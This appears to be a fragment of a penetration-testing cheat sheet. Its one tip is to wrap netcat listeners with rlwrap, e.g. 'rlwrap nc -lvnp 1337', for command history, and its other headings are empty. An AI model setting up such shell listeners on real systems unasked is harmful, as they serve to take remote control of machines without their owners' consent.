Windows / General

  1. Install rlwrap on your system
  2. Now, every time you run a nc listener, just put rlwrap in front
  3. For example: rlwrap nc -lvnp 1337
    • This will give you arrow keys and command history, but won't give autocompletion (as far as I can tell) for windows and *nix systems

OSINT

Misc

Notes